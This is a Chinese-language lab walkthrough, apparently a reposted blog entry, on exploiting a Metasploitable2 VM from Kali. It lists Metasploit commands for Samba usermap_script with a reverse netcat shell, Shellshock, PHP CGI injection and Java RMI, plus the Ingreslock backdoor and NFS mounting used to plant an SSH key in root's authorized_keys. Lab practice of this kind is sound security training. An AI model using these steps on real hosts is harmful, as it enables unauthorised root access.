漏洞利用六:Linux系统漏洞利用
Posted 兔子长虎牙
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了漏洞利用六:Linux系统漏洞利用相关的知识,希望对你有一定的参考价值。
准备:直接用一个工具包,在虚拟机上直接打开Linux环境。此虚拟机为靶机。
账号:msfadmin 密码:msfadmin
设权限sudo passwd root 改root密码:msfadmin
切换权限:su root 输密码:msfafmin
重启网卡:/etc/init.d/networking restart
xshell连接地址:192.168.1.103(桥接)
一、利用samba 服务漏洞入侵linux主机(samba低版本),对应端口:139、445
靶机IP:192.168.1.103
查看本地服务:netstat -lnt
结合nessus扫描本机的结果出现的漏洞,进行攻击。
攻击机:kali,IP:10.0.0.9
1.msfconsole
search samba
use exploit/multi/samba/usermap_script
set payload cmd/unix/reverse_netcat
show options
set rhosts 192.168.1.103
exploit
成功后可在本地直接输入命令操控对方。
二、CVE-2014-6271 Bash Shellshock(破壳)
Shellshock的原理是利用了Bash在导入环境变量函数时候的漏洞,启动Bash的时候,它不但会导入这个函数,而且也会把函数定义后面的命令执行。在有些CGI脚本的设计中,数据是通过环境变量来传递的,这样就给了数据提供者利用Shellshock漏洞的机会。简单来说就是由于服务器的cgi脚本调用了bash命令,由于bash版本过低,攻击者把有害数据写入环境变量,传到服务器端,触发服务器运行Bash脚本,完成攻击。cgi格式文件是“公共网关接口脚本”类型文件。
1.准备环境
靶机:metasploitable2(kali)系统,IP:192.168.1.103。
攻击机:kali,IP:10.0.0.9。
2.靶机上面
cd /usr/lib/cgi-bin/
(创建hello.sh文件:)
sudo nano hello.sh
(ctrl+x退出)(用vim对hello.sh脚本进行编辑:vim hello.sh)
#! /bin/bash
echo "Content-type: text/html"
echo ""
echo "Hello world!"
(:wq保存)
(保存好后,赋予脚本可执行权限,使用chmod命令:)
sudo chmod 755 hello.sh
(通过浏览器访问该脚本,可以看到成功执行,可以攻击)
http://192.168.1.103/cgi-bin/hello.sh
3.进入攻击机msfconsole。
search CVE-2014-6271
use exploit/multi/http/apache_mod_cgi_bash_env_exec
show options
set rhost 192.168.1.103
set targeturi /cgi-bin/hello.sh
exploit
三、php CGI漏洞
1.准备环境
靶机:同上
攻击机kali,IP:10.0.0.9。
2.search cve:2012-1823
use exploit/multi/http/php_cgi_arg_injection
show options
set rhost 192.168.1.103
exploit
四、Java RMI SERVER 命令执行漏洞与java cve-2013-0422
nmap –p 0-65535 IP #查看1099端口是否开启
use exploit/multi/misc/java_rmi_server
五、Ingreslock 后门
原理:Ingreslock后门监听1524端口,连接1524端口就可以直接提取root权限。
验证:在本地机上 Telnet 192.168.1.103 1524
六、NFS Exported Share Information Disclosure
rpcinfo -p 192.168.1.103 #显示本地系统中注册到rpcbind协议版本2的所有RPC服务
showmount -e 192.168.1.103 #显示被挂载的共享目录
ssh-keygen #生成密钥
默认密钥保存地址 (/root/.ssh/id_rsa.pub)
mkdir /tmp/test
mount -t nfs 192.168.1.103:/ /tmp/test
cat /root/.ssh/id_rsa.pub>>/tmp/test/root/.ssh/authorized_keys
ssh root@192.168.1.103
相当于远程连接
以上是关于漏洞利用六:Linux系统漏洞利用的主要内容,如果未能解决你的问题,请参考以下文章